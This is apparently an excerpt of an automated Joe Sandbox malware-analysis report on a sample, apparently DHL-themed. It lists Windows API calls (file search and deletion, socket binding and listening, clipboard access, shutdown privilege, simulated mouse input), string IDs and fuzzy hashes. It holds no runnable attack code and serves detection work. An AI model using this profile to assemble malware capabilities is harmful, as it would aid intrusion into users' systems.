                                                        • Instruction Fuzzy Hash: 2931AD32940619BADB14EFF4DC59ADF77ACAF49320F104566F815E20A0EB30DA85CB24
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00A197BE
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00A19819
                                                        • FindClose.KERNEL32(00000000), ref: 00A19824
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00A19840
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A19890
                                                        • SetCurrentDirectoryW.KERNEL32(00A66B7C), ref: 00A198AE
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A198B8
                                                        • FindClose.KERNEL32(00000000), ref: 00A198C5
                                                        • FindClose.KERNEL32(00000000), ref: 00A198D5
                                                          • Part of subcall function 00A0DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00A0DB00
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                        • String ID: *.*
                                                        • API String ID: 2640511053-438819550
                                                        • Opcode ID: 819c64bfe0002ba79c25277244b6ffa95d1ae394d8fce6fb28411bc8531d5902
                                                        • Instruction ID: be7672a177ebadaa7bad50d6b5aadd41fe330674a7417bcbba4e2fdc9d9c788d
                                                        • Opcode Fuzzy Hash: 819c64bfe0002ba79c25277244b6ffa95d1ae394d8fce6fb28411bc8531d5902
                                                        • Instruction Fuzzy Hash: 06319E32540619BEDB10EFE4EC59ADF77ACAF4A370F144566F814A21A0EB30DA85CB60
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?), ref: 00A18257
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A18267
                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A18273
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A18310
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A18324
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A18356
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A1838C
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A18395
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectoryTime$File$Local$System
                                                        • String ID: *.*
                                                        • API String ID: 1464919966-438819550
                                                        • Opcode ID: 1147deee973fe15c46ecac4ee59d427f62a08a71656a0cb09a3f34b687e78688
                                                        • Instruction ID: cea09196cea986b0a5ff0bd12e905f040213c9165b1ee5103dc31e58e686960a
                                                        • Opcode Fuzzy Hash: 1147deee973fe15c46ecac4ee59d427f62a08a71656a0cb09a3f34b687e78688
                                                        • Instruction Fuzzy Hash: 216169B25043459FCB10EF64C844AEEB3E8FF89310F04891EF99997251EB35E945CB92
                                                        APIs
                                                          • Part of subcall function 009A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009A3A97,?,?,009A2E7F,?,?,?,00000000), ref: 009A3AC2
                                                          • Part of subcall function 00A0E199: GetFileAttributesW.KERNEL32(?,00A0CF95), ref: 00A0E19A
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00A0D122
                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00A0D1DD
                                                        • MoveFileW.KERNEL32(?,?), ref: 00A0D1F0
                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00A0D20D
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A0D237
                                                          • Part of subcall function 00A0D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00A0D21C,?,?), ref: 00A0D2B2
                                                        • FindClose.KERNEL32(00000000,?,?,?), ref: 00A0D253
                                                        • FindClose.KERNEL32(00000000), ref: 00A0D264
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                        • String ID: \*.*
                                                        • API String ID: 1946585618-1173974218
                                                        • Opcode ID: 3f22709a127375d2fb12353b0af2bf24a718f2106e6072a5b2e004d03474f5dc
                                                        • Instruction ID: 0b9424f6a0a987deb7323d9940a6c6453da46b34efd2bca0431ff66cb2f04431
                                                        • Opcode Fuzzy Hash: 3f22709a127375d2fb12353b0af2bf24a718f2106e6072a5b2e004d03474f5dc
                                                        • Instruction Fuzzy Hash: 77613C3280511DAFCF05EBE0EE52AEEB775AF95340F248169E40277191EB356F09DBA0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                        • String ID:
                                                        • API String ID: 1737998785-0
                                                        • Opcode ID: 468a676c5430f54f896d110afa3d28befd1029eca9d0af34e9e5839c81cae059
                                                        • Instruction ID: 7bbde4b0aa83957e29c00f8a7c187b399fbf05783956fcee2de738ff8bcbc0d0
                                                        • Opcode Fuzzy Hash: 468a676c5430f54f896d110afa3d28befd1029eca9d0af34e9e5839c81cae059
                                                        • Instruction Fuzzy Hash: 31419D35604611AFD310DF65E889B5ABBE5EF44328F14C099F8199F6A2C735EC82CB90
                                                        APIs
                                                          • Part of subcall function 00A016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A0170D
                                                          • Part of subcall function 00A016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A0173A
                                                          • Part of subcall function 00A016C3: GetLastError.KERNEL32 ref: 00A0174A
                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00A0E932
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                        • String ID: $ $@$SeShutdownPrivilege
                                                        • API String ID: 2234035333-3163812486
                                                        • Opcode ID: 55b0efea65f98e473eeeb8a6c2100d2c70d40ccc84a4e02963ee42c554ffc000
                                                        • Instruction ID: 218293ffad4449ed264fe9eff4fc3850c0e84532ff4825f64a8d7e1748040a61
                                                        • Opcode Fuzzy Hash: 55b0efea65f98e473eeeb8a6c2100d2c70d40ccc84a4e02963ee42c554ffc000
                                                        • Instruction Fuzzy Hash: 0901D673A10219ABEB54A7B4BD86BBBB26CA714790F154D21FC12F21D1D5A15C40A290
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00A21276
                                                        • WSAGetLastError.WSOCK32 ref: 00A21283
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00A212BA
                                                        • WSAGetLastError.WSOCK32 ref: 00A212C5
                                                        • closesocket.WSOCK32(00000000), ref: 00A212F4
                                                        • listen.WSOCK32(00000000,00000005), ref: 00A21303
                                                        • WSAGetLastError.WSOCK32 ref: 00A2130D
                                                        • closesocket.WSOCK32(00000000), ref: 00A2133C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$closesocket$bindlistensocket
                                                        • String ID:
                                                        • API String ID: 540024437-0
                                                        • Opcode ID: 691a53cc25010a52e05b086015642f59c53885b6f3ff41f2bf97fed7397e8043
                                                        • Instruction ID: dc0501c2b0dc4debc13695e115316e3d7274bb943bdbe8526ee047a71de4d50f
                                                        • Opcode Fuzzy Hash: 691a53cc25010a52e05b086015642f59c53885b6f3ff41f2bf97fed7397e8043
                                                        • Instruction Fuzzy Hash: 62418631600110DFD710DF68D884B69B7E6AF96328F1881A8E8569F292C771ED82CBE1
                                                        APIs
                                                        • _free.LIBCMT ref: 009DB9D4
                                                        • _free.LIBCMT ref: 009DB9F8
                                                        • _free.LIBCMT ref: 009DBB7F
                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00A43700), ref: 009DBB91
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00A7121C,000000FF,00000000,0000003F,00000000,?,?), ref: 009DBC09
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00A71270,000000FF,?,0000003F,00000000,?), ref: 009DBC36
                                                        • _free.LIBCMT ref: 009DBD4B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                        • String ID:
                                                        • API String ID: 314583886-0
                                                        • Opcode ID: 23f9ec4e2d2a046cffdddaeaa0fd00a64c693141c67810d4b90d50fcc11a0587
                                                        • Instruction ID: c8e9a5a953ff1182d2e9ea80f0c4023f2e4ffb6000b07dd59a091ced69445487
                                                        • Opcode Fuzzy Hash: 23f9ec4e2d2a046cffdddaeaa0fd00a64c693141c67810d4b90d50fcc11a0587
                                                        • Instruction Fuzzy Hash: A4C10571984244EBCB20DF79CC51BAABBEDEF81350F16C1ABE49497352EB309E419790
                                                        APIs
                                                          • Part of subcall function 009A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009A3A97,?,?,009A2E7F,?,?,?,00000000), ref: 009A3AC2
                                                          • Part of subcall function 00A0E199: GetFileAttributesW.KERNEL32(?,00A0CF95), ref: 00A0E19A
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00A0D420
                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00A0D470
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A0D481
                                                        • FindClose.KERNEL32(00000000), ref: 00A0D498
                                                        • FindClose.KERNEL32(00000000), ref: 00A0D4A1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                        • String ID: \*.*
                                                        • API String ID: 2649000838-1173974218
                                                        • Opcode ID: 2989bcfba99fa90ef33be1e20ef2c3eac9ecfd957a9ad2e7de1ab1cac4cf9fd8
                                                        • Instruction ID: 4884b9690e62470670f3044a8656624e506e52c08a262e8240d14215ea9550a6
                                                        • Opcode Fuzzy Hash: 2989bcfba99fa90ef33be1e20ef2c3eac9ecfd957a9ad2e7de1ab1cac4cf9fd8
                                                        • Instruction Fuzzy Hash: 16315E72018355AFC304EFA4DC919AFB7A8BED2354F448A1DF4D193191EB35AA09C7A3
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: __floor_pentium4
                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                        • API String ID: 4168288129-2761157908
                                                        • Opcode ID: 833a46afc1a833a674fb3fe7b79744326a46552fe875c9e6ca72771b1796ec79
                                                        • Instruction ID: faeafb8d9c9db85a053159070b9f91752e1cd2f9687735d2917f2a25406f4365
                                                        • Opcode Fuzzy Hash: 833a46afc1a833a674fb3fe7b79744326a46552fe875c9e6ca72771b1796ec79
                                                        • Instruction Fuzzy Hash: 9BC24A71E446288BDB25DF28DD517EAB7B9EB84304F1485EBD44EE7240E778AE818F40
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00A164DC
                                                        • CoInitialize.OLE32(00000000), ref: 00A16639
                                                        • CoCreateInstance.OLE32(00A3FCF8,00000000,00000001,00A3FB68,?), ref: 00A16650
                                                        • CoUninitialize.OLE32 ref: 00A168D4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                        • String ID: .lnk
                                                        • API String ID: 886957087-24824748
                                                        • Opcode ID: e5e11bc3db439e49ead62dc916fc849163c53f1bc6ab86814fe715352ec9b0c2
                                                        • Instruction ID: f8377a767ee706c57ffb170674d335408ca7321007b1b7cd8c18a4e5d8d7d1aa
                                                        • Opcode Fuzzy Hash: e5e11bc3db439e49ead62dc916fc849163c53f1bc6ab86814fe715352ec9b0c2
                                                        • Instruction Fuzzy Hash: 1CD14871508201AFC304EF24C881EABB7E9FFD9714F04896DF5958B2A1EB71E945CB92
                                                        APIs
                                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 00A222E8
                                                          • Part of subcall function 00A1E4EC: GetWindowRect.USER32(?,?), ref: 00A1E504
                                                        • GetDesktopWindow.USER32 ref: 00A22312
                                                        • GetWindowRect.USER32(00000000), ref: 00A22319
                                                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00A22355
                                                        • GetCursorPos.USER32(?), ref: 00A22381
                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00A223DF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                        • String ID:
                                                        • API String ID: 2387181109-0
                                                        • Opcode ID: 457a566bbef591bc3101b575718a1ea8c1d1250d396ef7428474047b70370f7c
                                                        • Instruction ID: c1a655771fca5088e40fab2b7658492b635ac476c09d8fcf03a285595218d416
                                                        • Opcode Fuzzy Hash: 457a566bbef591bc3101b575718a1ea8c1d1250d396ef7428474047b70370f7c
                                                        • Instruction Fuzzy Hash: D531E372504315AFD720DF58DC45F5BB7A9FF84720F000A29F985AB191DB34E909CB92
                                                        APIs
                                                          • Part of subcall function 009A9CB3: _wcslen.LIBCMT ref: 009A9CBD
                                                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00A19B78
                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00A19C8B
                                                          • Part of subcall function 00A13874: GetInputState.USER32 ref: 00A138CB
                                                          • Part of subcall function 00A13874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A13966
                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00A19BA8
                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00A19C75
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                        • String ID: *.*
                                                        • API String ID: 1972594611-438819550
                                                        • Opcode ID: 68efcb8ffbb94da7afb6a27718b93be7af136b4eafd813f87e70e1e9fda61cc3
                                                        • Instruction ID: 17c82b1d698a8c1b6babb16f9bacf057dbc5861ea4011390144b3365d298b915
                                                        • Opcode Fuzzy Hash: 68efcb8ffbb94da7afb6a27718b93be7af136b4eafd813f87e70e1e9fda61cc3
                                                        • Instruction Fuzzy Hash: 94416F7190421AAFCF54DFA4CD55AEEBBB8FF45310F144155F845A2191EB309E84CFA1
                                                        APIs
                                                          • Part of subcall function 009B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009B9BB2
                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 009B9A4E
                                                        • GetSysColor.USER32(0000000F), ref: 009B9B23
                                                        • SetBkColor.GDI32(?,00000000), ref: 009B9B36
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Color$LongProcWindow
                                                        • String ID:
                                                        • API String ID: 3131106179-0
                                                        • Opcode ID: 83ae5dbd1ed6ec2f0c3f87bc743e2f9c5bb9c713fa99d4a049a705932cfec7cc
                                                        • Instruction ID: adbaf59fe87cb07988e268debaf3e46b9f34fa6153e8915c663ead30d1c734c5
                                                        • Opcode Fuzzy Hash: 83ae5dbd1ed6ec2f0c3f87bc743e2f9c5bb9c713fa99d4a049a705932cfec7cc
                                                        • Instruction Fuzzy Hash: E3A15E70128518BEE728EA7C8E89EFB769DDF82360F154509F302C6691CA299D42C372
                                                        APIs
                                                          • Part of subcall function 00A2304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A2307A
                                                          • Part of subcall function 00A2304E: _wcslen.LIBCMT ref: 00A2309B
                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00A2185D
                                                        • WSAGetLastError.WSOCK32 ref: 00A21884
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00A218DB
                                                        • WSAGetLastError.WSOCK32 ref: 00A218E6
                                                        • closesocket.WSOCK32(00000000), ref: 00A21915
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 1601658205-0
                                                        • Opcode ID: ca2fbf771f1c1baded5cafbc2687f363d59fb687c94fe39303585846d5f83ca3
                                                        • Instruction ID: 1d01f4d71343a29bb4aa95fd38a7a5e0c57611fc1106baa80d2db185597ffbe9
                                                        • Opcode Fuzzy Hash: ca2fbf771f1c1baded5cafbc2687f363d59fb687c94fe39303585846d5f83ca3
                                                        • Instruction Fuzzy Hash: E251C471A00210AFDB10EF64D886F6A77E5AB85718F088458F915AF3D3D771ED418BE1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                        • String ID:
                                                        • API String ID: 292994002-0
                                                        • Opcode ID: b65cb92004c56ef8a208ff48742fc791131f9bb2e268e22da53969def47624f2
                                                        • Instruction ID: e653010dc79e75153959f81ecc6a9bb409fbded4bf4a20731a52360bdaa5198f
                                                        • Opcode Fuzzy Hash: b65cb92004c56ef8a208ff48742fc791131f9bb2e268e22da53969def47624f2
                                                        • Instruction Fuzzy Hash: FB21AE317402109FD7208F2ACC94B6A7BE5EF85365F19A068F84A9B351DB71EC42CB90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
